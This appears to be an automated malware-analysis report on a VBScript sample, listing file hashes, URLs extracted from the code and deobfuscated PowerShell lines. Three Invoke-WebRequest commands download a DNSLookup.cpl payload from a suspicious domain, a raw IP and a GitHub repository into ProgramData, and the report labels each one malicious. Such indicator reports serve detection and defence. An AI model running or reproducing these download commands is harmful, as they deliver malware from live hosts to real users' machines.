| Hash | Hash Value |
|---|---|
| MD5 | 1c34c387ea28ebbe173fc0bcae0a2d86 |
| Sha1 | 33efcd8c290df171da5f10924dab585b8be8a115 |
| Sha256 | 0cba8f95a87418faf019a814d7a277762786b89d4dc04af045d02a39329a2293 |
| Sha384 | 3f3c058f605578e7e3aae3644381dd1085532f8146aac8e43df34b0e75807f11ee823ca6144e39d6e403f39c3cb6acbe |
| Sha512 | 1666d132544e0aad0bf472ac6c4c80afda1c7f2bb22b0d60ad44d2292937eac672c28098cbbe1dc602996df5a2d31f263d2fc8ed64de5d9f385fa479b524a60e |
| SSDeep | 96:TPzx3n3aS0bTXRS/lq/Mh73h/9GZEuJdFtS5X+wo+iZdFYo+7gpafs1tyOjckdgO:Lzh336XRSQykJQ5XIt/0Gl6RzE |
| TLSH | 5CD13A8CE1FB6BDE6C332BE5588C2C8D640852B17D04713EE8A574D0AD7686CE1F9434 |

| Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://upload.wikimedia.org/wikipedia/commons/5/56/Bsodwindows10.png |
| URLs in VB Code - #2 | https://sbrevorp.xyz/Krawl/DNSLookup.cpl |
| URLs in VB Code - #3 | http://45.143.167.244/Krawl/DNSLookup.cpl |
| URLs in VB Code - #4 | https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "http://45.143.167.244/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://sbrevorp.xyz/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |

| Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://upload.wikimedia.org/wikipedia/commons/5/56/Bsodwindows10.png | 1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #2 | https://sbrevorp.xyz/Krawl/DNSLookup.cpl | 1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #3 | http://45.143.167.244/Krawl/DNSLookup.cpl | 1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #4 | https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl | 1c34c387ea28ebbe173fc0bcae0a2d86 |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "http://45.143.167.244/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious | 1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #1] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious | 1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #2] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://sbrevorp.xyz/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious | 1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #0] > [PowerShell Command] |